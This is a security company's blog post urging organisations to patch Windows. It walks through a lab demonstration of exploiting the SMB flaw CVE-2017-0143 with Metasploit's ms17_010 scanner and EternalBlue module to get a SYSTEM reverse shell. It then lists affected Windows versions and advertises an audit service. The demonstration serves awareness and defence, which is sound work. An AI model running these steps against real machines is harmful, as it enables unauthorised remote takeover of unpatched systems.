24
JULY, 2018
Windows
SMB
Vulnerability

Patching’ is considered something you do when there is a hole in your trousers or top, this is exactly the same within the technology world but instead, patching involves the operating systems or the computer program.

More often than not, applying updates on your personal computer is a trivial endeavour. But for businesses, it is vital to keep software up to date in order to mitigate attacks and reduce your attack vector.

The complexity and impact of keeping systems up to date will vary across the industry. For example, running Windows XP or Windows 7 in the XRAY department of a hospital and not installing the latest updates will leave the organisation at risk. IT departments of organisations like this tend to refrain from updating such systems because it is highly likely that an update or an upgrade will force the software to become incompatible or troublesome.

Secrutiny’s findings

Out of the 500,000+ endpoints Secrutiny has audited in the last year, 100% of organisations have had inconsistencies in their operating system build alone.

One organisation that we have audited in the past had Windows 7 v6.1 Build 7601 SP1 x64 as the majority of their active operating systems running across their business. The problem with this version is that it has several vulnerabilities as shown on the CVE (Common Vulnerabilities and Exposure) website.

Screenshot of CVE (Common Vulnerabilities and Exposure) website.

Demonstration of exploiting operating systems.

The following is a demonstration of exploiting the operating system using CVE-2017-0143 (Windows SMB Remote Code Execution Vulnerability) on an unprivileged user, to gain privileged access:

SET UP: VICTIM
OS Windows 7 Home Basic X86 SP1
RAM 4GB
PROCESSOR COUNT 1
CORES 4
SET UP: ATTACKER
OS Kali Linux X64
RAM 4GB
PROCESSOR COUNT 1
CORES 4

STEP 1:

Firstly, we can run a scanner within Metasploit to determine if the target is likely to be vulnerable. Open a terminal within Kali and run the Metasploit scanner – commands listed below.

  • Msfconsole
  • auxiliary/scanner/smb/smb_ms17_010
    Set the RHOSTS to be the IP of the target.
  • Options
  • Set RHOSTS 192.168.38.128
  • Run

STEP 2:

From the output of the scan, it is likely that the target is vulnerable. We can test this theory by running the exploit against the machine.

  • exploit/windows/smb/ms17_010_eternalblue
  • Options
    Set the RHOST to be the IP of the target.
  • Set rhost 192.168.38.128

STEP 3:

Now we can simply run the exploit which will create a privileged reverse shell instance.
Note: The CMD.exe process will not show up on the target machine’s task manager because the payload gets injected into spoolsv.exe. (Spoolsv.exe is responsible for handling printing and fax jobs on a Windows operating system). The Windows Task Manager image shows that spoolsv.exe is running as system. To protect against similar vulnerabilities, it is important to install critical Windows updates.
  • Windows Vista SP2
  • Windows 7 SP1
  • Windows 8.1
  • Windows RT 8.1
  • Windows 10 Gold, 1511, and 1607
  • Windows Server 2008 SP2 and R2 SP1
  • Windows Server 2012 Gold and R2
  • Windows Server 2016
The Windows Task Manager image shows that spoolsv.exe is running as system.

A Cyber Risk Audit will determine which machines are susceptible to the SMB vulnerability.

The Cyber Risk Audit provides a factual view of internal risk and breach susceptibility by assessing your organisations IT environment, informing defined and evidenced security improvement priorities.

While studying Computer Science at Kent University, Reehan Aslam worked at Secrutiny Ltd for a year as a Technical Analyst.

Reehan is currently centred on defending organisations and highlighting security flaws and risk within networks and applications.

His interests include Static Analysis, Network Traffic Analysis and Digital Forensics.

 

Keep Up To Date

Join our mailing list to receive the latest news and updates from Secrutiny.

GET IN TOUCH…

Keeping you up-to-date

*We’d love to keep you up to date with security alerts, free tools & techniques, event invites and company updates. We’ll always treat your details with the utmost care and will never sell them to other companies for marketing purposes. Remember you can change your preferences and opt-out at any time.